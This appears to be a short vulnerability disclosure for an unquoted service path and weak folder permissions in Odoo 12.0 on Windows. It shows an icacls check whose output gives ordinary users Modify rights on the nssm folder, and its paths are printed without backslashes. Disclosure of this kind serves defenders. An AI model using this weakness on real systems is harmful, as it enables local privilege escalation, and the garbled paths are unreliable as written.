Odoo version 12.0.20190101 suffers from an unquoted service path vulnerability.
# Exploit Title: Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path
# Exploit Author: 1F98D
# Vendor Homepage: https://www.odoo.com/
# Software Link: https://nightly.odoo.com/12.0/nightly/windows/odoo_12.0.20190101.exe
# Tested Version: 12.0.20190101
# Tested on OS: Windows
# Step to discover Unquoted Service Path:
C:> icacls "C:Program Files (x86)Odoo 12.0nssm"
C:Program Files (x86)Odoo 12.0nssm pc-1user-1:(OI)(CI)(M)
NT SERVICETrustedInstaller:(I)(F)
NT SERVICETrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITYSYSTEM:(I)(F)
NT AUTHORITYSYSTEM:(I)(OI)(CI)(IO)(F)
BUILTINAdministrators:(I)(F)
BUILTINAdministrators:(I)(OI)(CI)(IO)(F)
BUILTINUsers:(I)(RX)
BUILTINUsers:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITYALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITYALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITYALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITYALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
